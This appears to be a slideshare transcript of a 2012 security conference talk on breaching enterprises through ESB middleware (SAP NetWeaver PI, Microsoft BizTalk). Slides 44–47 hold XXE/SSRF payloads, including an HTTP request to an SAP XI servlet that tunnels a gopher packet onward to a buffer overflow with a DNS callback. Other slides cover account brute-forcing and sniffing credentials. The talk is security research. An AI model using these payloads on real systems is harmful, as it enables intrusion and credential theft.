Invest in securityto secure investmentsHow I will break your enterprise:ESB Security and moreAlexander PolyakovCTO at ERPS...
MeBusiness application security expert
The questionHow to break a secure enterprise network?
HintWhat do we do if we have a secure target website on a hosting?
Answer• We can do the same for companies• Just Google for the target company suppliers and customers• Pwn one of them• Fi...
But how?• Almost all big companies are connected to each other• To make their business work• For example, companies genera...
Enterprise Service Bus
ESB
What they look like
What do we know about their security?• Nothing – Actually, very little info• They can have vulnerabilities – A lot of vu...
Some ESB problemsESB is all about DATA• Missing encryption – Not so easy to configure, so mostly unencrypted – A lot of ...
If we attack ESB from a connected company• We have one bonus• As we have already pwn’d the connected company• We have aut...
IBM Web Sphere MQ• IBM Web Sphere MQ• Middleware application for handling messaging within an enterprise network• The fir...
SAP NetWeaver PI• SAP NetWeaver PI / XI• Tool for process integration / system integration• Has SOAP Adapter• With default...
SAP NetWeaver PI
Microsoft BizTalk• MS BizTalk• For the same purpose• ESB toolkit used to be additional software, but in BizTalk 2013, it ...
If somebody really used it?
BizTalk map Company External Web-portal Suppliers HR ...
Microsoft BizTalk: how it works• You send data to a virtual “Input port”• The port can be anything, from a file to an FTP ...
Microsoft BizTalkDifferent ways to transfer data –Simple transfer (Static binding) –Bindings (Dynamic binding) –Itinerary
BizTalk Transformation example
BizTalk Transformation example• The operation is performed by a functoid• There are a lot of functoids with math and l...
BizTalk BindingVirtual ports must be linked to the real ports they call (binding)• Static binding. A static port is alread...
A packet with dynamic binding (any ideas?)
Exploiting dynamic binding easily
BizTalk Binding: use your imagination• XPATH• STATIC• Business Rules Engine (BRE)• BRI• UDDI• UDDI3• LDAP• ...
BizTalk Itinerary: full control over the packet• Itinerary-based routing simplifies the development of enterprise-level m...
Searching for BizTalk applications• OK, cool, but how can we find all this stuff?• Except sniffing?• Answer: UDDI• ...
Bingo - Bongo!
And one more thing: don’t forget about web.config
So, u are inside thecompany’s network Now what?
Secure corporate network Corporate ERP IndustrialThe network network ...
But wait.There must be some links!
Real corporate networkThe Corporate ERP IndustrialInternet network network ...
And…Attackers can use them!
Corporate network attack scenarioThe Corporate ERP IndustrialInternet netwo...
But how?
Supa Sexy Robo Fashion
SSRF proxy attack Corporate Secure network network Packet B Packet BPa...
SSRF• A possibility to use a vulnerable server as a proxy to attack other servers located in secure subnetwork• A way to ...
Exploiting SSRF For every SSRF attack, there must be at least 2 vulnerabilities to successfully trigger the attack:• Fir...
Multiprotocol calls (in XML)• A lot of XML stuff in ESB• XML seems to be the new TCP• Almost all big projects use XML base...
Multiprotocol calls in XML• XML – XML External Entity – XSD definition• XML Encryption• XML Signature• WS-Policy• From...
Exploiting Gopher (Example)<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY date SYST...
XXE Tunneling (Example) Server A (Portal or XI)POST/XISOAPAdapter/servle...
XXE Tunneling (Hint 2)• Next step is to pack exploit in packet B inside Packet A• We need to insert non-printable sy...
XXE Tunneling to Buffer Overflow (Result) Server A on the ...
Great, we can jump from one secured network to another. What’s next?
We are inside, so what?• All your systems have password lock policies• Because we are in a secure company, rrright?• ...
We are inside, so what?• All your systems have password lock policies• Because we are in a secure company, rrright?• And s...
OK, but what about creating a new user?
Create new user, MsSQL
The same applies to when a user is changing their password due to security policies
Change user password, MsSQL
More than real. 5000 users change pass every 90 days => Every hour, 2 users change their pa...
If we don’t want to wait, we can brute until the account is locked, then the administrator will unlock it and 99% ...
Why MsSQL?• Just because I sometimes want to speak about something other than SAP and Oracle, so let it be MS• It’s ever...
They have the same problems• MySQL• Oracle console• Oracle Enterprise Manager• MsSQL Console• MsSQL Enterprise M...
I don’t want user interaction• We need some kind of user interaction• But that’s not so tasty• Let’s look at something else
What about them?…And 50 more
Issue tracking systems• Noh I’m not talking about XSS/SQLI/LFI/OMG/WTF/ETC• Of course they exist, but• We are in a “...
Any ideas? :)
Password change e-mail
Sniff mail requestsMail requests are unencrypted
Access to the kingdom
SoBecause they usually have a wikiwhere all the neat stuff is stored, like keys to other systems
Questions?web: www.dsec.ru www.erpscan.come-mail: a.polyakov@dsec.ruTwitter: @sh2kerrBig thanks to Nikolay Mesch...
Polyakov how i will break your enterprise. esb security and more
of 68

Polyakov how i will break your enterprise. esb security and more

Published on: Mar 4, 2016
Source: www.slideshare.net


Transcripts - Polyakov how i will break your enterprise. esb security and more

  • 1. Invest in securityto secure investmentsHow I will break your enterprise:ESB Security and moreAlexander PolyakovCTO at ERPScan (Digital Security)November 19, 2012
  • 2. MeBusiness application security expert
  • 3. The questionHow to break a secure enterprise network?
  • 4. HintWhat do we do if we have a secure target website on a hosting?
  • 5. Answer• We can do the same for companies• Just Google for the target company suppliers and customers• Pwn one of them• Find a link to the secured company
  • 6. But how?• Almost all big companies are connected to each other• To make their business work• For example, companies generate automatic Payment Orders from one business application to another• They use some kind of middleware to do this• Sometimes, those systems can be open to the Internet• Mostly not• But they must be open for partners• What kind of systems are u talking about?
  • 7. Enterprise Service Bus
  • 8. ESB
  • 9. What they look like
  • 10. What do we know about their security?• Nothing – Actually, very little info• They can have vulnerabilities – A lot of vulnerabilities• Because they are complex – Very complex• And very customized – Because it’s more of a framework than software
  • 11. Some ESB problemsESB is all about DATA• Missing encryption – Not so easy to configure, so mostly unencrypted – A lot of swag data transferring• Support for a lot of interfaces and protocols – Many points of failure – Can be used as a proxy to attack other systemsAnd, of course, all the other software security problems
  • 12. If we attack ESB from a connected company• We have one bonus• As we have already pwn’d the connected company• We have auth data to connect to ESB interfaces• But our goal is to jump through ESB to the target company
  • 13. IBM Web Sphere MQ• IBM Web Sphere MQ• Middleware application for handling messaging within an enterprise network• The first ESB that was publicly researched for vulnerabilities (in 2007)• A great presentations by MWRLab• Whitepaper with 87 pages of MQ insights!• http://labs.mwrinfosecurity.com/assets/141/mwri_websphere -mq-security-white-paper-part1_2008-05-06.pdf
  • 14. SAP NetWeaver PI• SAP NetWeaver PI / XI• Tool for process integration / system integration• Has SOAP Adapter• With default services• We found one that was accessible without authorizations• Accept XML: any XML based attack (Patched by SAP Note 1707494) DilbertMSG• /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.• More about this later
  • 15. SAP NetWeaver PI
  • 16. Microsoft BizTalk• MS BizTalk• For the same purpose• ESB toolkit used to be additional software, but in BizTalk 2013, it is integrated• 0 results for “BizTalk Security” in search engines• Doesn’t have default services with auth bypass :(
  • 17. If somebody really used it?
  • 18. BizTalk map Company External Web-portal Suppliers HR Customers Data WarehouseBizTalk Banks Logistics Insurance BizTalk ERP Partners Billing Branches Picture taken from http://habrahabr.ru/post/94861/
  • 19. Microsoft BizTalk: how it works• You send data to a virtual “Input port”• The port can be anything, from a file to an FTP folder or a web service or something else• BizTalk takes this data and transforms it (Orchestration)• There are special tools to perform the transformation• Then the packet is sent to an “Output port” So, the simple transformation can have common XML issues depending on the application
  • 20. Microsoft BizTalkDifferent ways to transfer data –Simple transfer (Static binding) –Bindings (Dynamic binding) –Itinerary
  • 21. BizTalk Transformation example
  • 22. BizTalk Transformation example• The operation is performed by a functoid• There are a lot of functoids with math and logical stuff• One of the funniest to attack is Database lookup functoid• If u find it in some XML, u can connect to external DB’s• Sometimes with integrated security (trust)Provider=msdaora;Data Source=thisdb;Persist Security Info=False;Integrated Security=Yes;• Also supported: Sybase, Oracle, MySQL, Informix, FoxPro, Firebird, Exchange, Excel, DBase, DB2,Access …
  • 23. BizTalk BindingVirtual ports must be linked to the real ports they call (binding)• Static binding. A static port is already configured at the time of deployment to use a transport so as to deliver messages to a specific external end point. A transport type selects an adapter and a URI address.• Direct binding can also be used to send messages directly into the message box. External binding configuration cannot be used with directly bound orchestration ports.• Dynamic Binding. Transport types and locations dynamically selected by dynamic ports. The orchestration port is responsible for having the required properties created within the message context.
  • 24. A packet with dynamic binding (any ideas?)
  • 25. Exploiting dynamic binding easily
  • 26. BizTalk Binding: use your imagination• XPATH• STATIC• Business Rules Engine (BRE)• BRI• UDDI• UDDI3• LDAP• MQS• FTP• FILE• .• .• .
  • 27. BizTalk Itinerary: full control over the packet• Itinerary-based routing simplifies the development of enterprise-level messaging• In simple words, an itinerary is a sequence of operations performed on a message• An itinerary consists of the list of services to execute (which can contain routing, transformation, and custom services) and the configuration information required to resolve the metadata necessary to execute each of these services• For example, it may instruct the service to perform UDDI or Business Rules Engine (BRE) lookup for information about a specific target end point to which it will route the message A huge area to have fun
  • 28. Searching for BizTalk applications• OK, cool, but how can we find all this stuff?• Except sniffing?• Answer: UDDI• Database of all web services installed on BizTalk• Just look for ports 80 or 8080 for /uddi or /uddipublic• Add WSDL to URL :)
  • 29. Bingo - Bongo!
  • 30. And one more thing: don’t forget about web.config
  • 31. So, u are inside thecompany’s network Now what?
  • 32. Secure corporate network Corporate ERP IndustrialThe network network networkInternet
  • 33. But wait.There must be some links!
  • 34. Real corporate networkThe Corporate ERP IndustrialInternet network network network
  • 35. And…Attackers can use them!
  • 36. Corporate network attack scenarioThe Corporate ERP IndustrialInternet network network network
  • 37. But how?
  • 38. Supa Sexy Robo Fashion
  • 39. SSRF proxy attack Corporate Secure network network Packet B Packet BPacket A
  • 40. SSRF• A possibility to use a vulnerable server as a proxy to attack other servers located in secure subnetwork• A way to jump from one subnetwork to another• A lot of examples of how to run SSRF attack• We can use any popular business application to run SSRF• More details about SSRF – Part 1 http://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-Businness-critical- applications-whitepaper.pdf – Part 2 http://erpscan.com/wp-content/uploads/2012/11/SSRF.2.0.poc_.pdf
  • 41. Exploiting SSRF For every SSRF attack, there must be at least 2 vulnerabilities to successfully trigger the attack:• First vulnerability – Functionality in some service on Server A which allows us to send remote packets (for other types of SSRF)• Second vulnerability – Vuln. in service on server B (for remote SSRF ) – Vuln. in localhost service on server A (for local SSRF) – Vuln. in client app. on server A (for back-connect SSRF)
  • 42. Multiprotocol calls (in XML)• A lot of XML stuff in ESB• XML seems to be the new TCP• Almost all big projects use XML based data transfer• There are a lot of XML based protocols with different options to call external resources and thus conduct SSRF attacks• There is at least one element type which fits almost all XML based schemes. The type is: xsd:anyURI• URIs also encompass URLs of other schemes (e.g., FTP, gopher, telnet), as well as URNs• Popular URIs: http:// ftp:// telnet:// …..
  • 43. Multiprotocol calls in XML• XML – XML External Entity – XSD definition• XML Encryption• XML Signature• WS-Policy• From WS-Security• WS-Addressing• XBRL• ODATA (edmx) – ODATA External Entity – Other• BPEL• STRATML• ……. Details: http://erpscan.com/wp-content/uploads/2012/11/SSRF.2.0.poc_.pdf
  • 44. Exploiting Gopher (Example)<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY date SYSTEM “gopher://172.16.0.1:3300/AAAAAAAAA" >]><foo>&date;</foo> What will happen??
  • 45. XXE Tunneling (Example) Server A (Portal or XI)POST/XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1Host: 192.168.0.1:8000 192.168.0.1<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY date SYSTEM AAAAAAAAAAAAA Server B (ERP,“gopher://172.16.0.1:3300/AAAAAAAAA" >]> <foo>&date;</foo> HR, BW etc.) Port 3300 telnet 172.16.0.1 3300 172.16.0.1
  • 46. XXE Tunneling (Hint 2)• Next step is to pack exploit in packet B inside Packet A• We need to insert non-printable symbols• God bless gopher; it supports urlencode like HTTP• It will also help us evade attack against IDS systems Packet APOST /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1Host: sapserver.com:80Content-Length: 7730<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY date SYSTEM “gopher://[Urlencoded Packet B]" >]><foo>&date;</foo>
  • 47. XXE Tunneling to Buffer Overflow (Result) Server A on the Internet (SAP XI)POST/XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1Host: sapserver.com:80 Packet B<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY date SYSTEM “gopher://[packetB]">]> http://company.com Server B in DMZ<foo>&date;</foo> exploit Packet C – Command and Control response to attacker by Shellcode DNS protocol, which is allowed service with for outband connections DNS payload 172.16.0.1
  • 48. Great, we can jump from one secured network to another. What’s next?
  • 49. We are inside, so what?• All your systems have password lock policies• Because we are in a secure company, rrright?• And secure applications send passwords securely• While user is authenticating
  • 50. We are inside, so what?• All your systems have password lock policies• Because we are in a secure company, rrright?• And secure applications send passwords securely• While user is authenticating!
  • 51. OK, but what about creating a new user?
  • 52. Create new user, MsSQL
  • 53. The same applies to when a user is changing their password due to security policies
  • 54. Change user password, MsSQL
  • 55. More than real. 5000 users change pass every 90 days => Every hour, 2 users change their passwords
  • 56. If we don’t want to wait, we can brute until the account is locked, then the administrator will unlock it and 99% change the pass
  • 57. Why MsSQL?• Just because I sometimes want to speak about something other than SAP and Oracle, so let it be MS• It’s everybody’s problem
  • 58. They have the same problems• MySQL• Oracle console• Oracle Enterprise Manager• MsSQL Console• MsSQL Enterprise Manager• etc…
  • 59. I don’t want user interaction• We need some kind of user interaction• But that’s not so tasty• Let’s look at something else
  • 60. What about them?…And 50 more
  • 61. Issue tracking systems• Noh I’m not talking about XSS/SQLI/LFI/OMG/WTF/ETC• Of course they exist, but• We are in a “very-very secure” company, which has WAF• And HTTPS• Really secure HTTPS (yes Moxie)
  • 62. Any ideas? :)
  • 63. Password change e-mail
  • 64. Sniff mail requestsMail requests are unencrypted
  • 65. Access to the kingdom
  • 66. SoBecause they usually have a wikiwhere all the neat stuff is stored, like keys to other systems
  • 67. Questions?web: www.dsec.ru www.erpscan.come-mail: a.polyakov@dsec.ruTwitter: @sh2kerrBig thanks to Nikolay Mescherin :)

Related Documents